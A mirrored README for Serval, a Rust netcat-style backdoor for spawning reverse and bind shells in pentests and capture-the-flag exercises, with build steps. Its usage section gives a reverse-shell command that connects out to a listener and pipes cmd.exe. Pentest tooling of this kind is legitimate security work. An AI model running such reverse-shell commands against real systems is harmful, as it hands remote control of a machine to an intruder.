GithubHelp home page GithubHelp logo

serval's Introduction

A Netcat style backdoor for pentesting and pentest challenges

Serval is a lightweight, easy-to-use, binary for spawning reverse and bind shells for pentests or pentesting exercises. Serval is cross platform and can be compiled for both Windows 32 & 64-bit and Linux 32 and 64-bit. Note: Due to the flexibility of Rust it may be possible to compile for other platforms (such as ARM) but I have not tested for other platforms.

Why?

I developed Serval to remove my dependecy on netcat during HacktheBox challenges since it can be bothersome to find netcat binaries for Windows (especially with the -e option) and it is even more difficult to find a binary from a trusted source.

Features

  • Cross-compileable! Can be built for Linux or Windows
  • Command line history. Up and Down arrows will scroll through command history.
  • Command line history search! ctrl-r to reverse search your command history.
  • Line editing. Backspace and left-right arrow keys work!
  • Interoperability. Only have netcat on your target? No problem! The serval listener can still catch the shell and give you the advanced features.

Installation

Rust Users (Compile from source)

Download the source from github

git clone https://github.com/tgadola/serval.git && cd serval-master

*Optional: Edit the build file at .cargo/config to rewrite your buildpath.

Build the binary for your current platform.

cargo build --release

*Note: v1.1.0 requires Rust nightly

You can build for other platforms using

cargo build --release --target <target-triple>

Other

If you're a particulary trusting individual you can download the pre-built binaries here.

Usage

By default Serval will either listen or connect to a port and pipe standard input and output to that connection. The -e flag will spawn a process and pipe its standard input and output across the network.

Start a listener

Serval listens on all interfaces.

Use the -H flag to activate the line editing and command history features!

serval -l 4400 -H

Spawn a reverse shell

serval.exe <listening ip> <listening port> -q -e cmd.exe

????

Profit

Special Thanks

A big thank you to @kkawakam-transferwise and their Rustyline crate, which does literally all of the heavy lifting. Check out Rustyline!

Thank you to the creators and contributors of Clap! Check out Clap.

Thank you to the creators and contributors of Anyhow! Check out Anyhow. +1 for the great crate name.

Thanks to @jaynus for all of his Rust advice

License

Apache 2.0. See the License file for more info.

serval's People

Contributors

tgadola avatar gre4twhite avatar

Stargazers

Rafael Matsuyama avatar winterrdog avatar avatar avatar Kamil Vavra avatar avatar Matthew Linney avatar avatar soffensive avatar Isaque Profeta avatar avatar barry avatar Jojo avatar xrkk avatar Diego Albuquerque avatar Spacial avatar Usama Abdul Sattar avatar paranoid soul avatar avatar N Auliajati avatar Avery Wagar avatar Dollarkillerx avatar avatar avatar LordCasser avatar moshe avatar raul17 avatar avatar me7ell avatar 突突兔 avatar Moon avatar 张德帅 avatar Varth Dader avatar avatar avatar avatar wavvs avatar Alexander Knorr avatar Gerald avatar 杨_小_小_小_小_明 avatar avatar QGW avatar avatar evandrix avatar avatar R ツ avatar Ankur Tyagi avatar Usman Khan avatar Ronny Xavier avatar avatar

Watchers

evandrix avatar iefuzzer avatar N Auliajati avatar avatar avatar

Forkers

daydayup40 h1d3r killvxk flatl1neapt usama7628674 diegoalbuquerque iq-scm

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.